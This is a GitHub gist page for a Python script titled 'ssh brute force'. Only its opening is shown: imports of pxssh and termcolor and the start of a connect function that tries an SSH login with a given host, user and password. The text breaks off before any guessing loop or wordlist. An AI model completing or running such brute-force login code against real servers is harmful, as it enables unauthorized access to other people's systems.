Skip to content

Instantly share code, notes, and snippets.

View thewindcolince's full-sized avatar

colince thewindcolince

  • Thedevbridge
  • douala
View GitHub Profile
@thewindcolince
thewindcolince / ssh_brutefore.py
Last active May 21, 2018 21:12
ssh brute force with python
#! /usr/bin/python3
from pexpect import pxssh
import termcolor
import sys
def connect(host,user,password):
try:
ssh=pxssh.pxssh()
ssh.force_password=True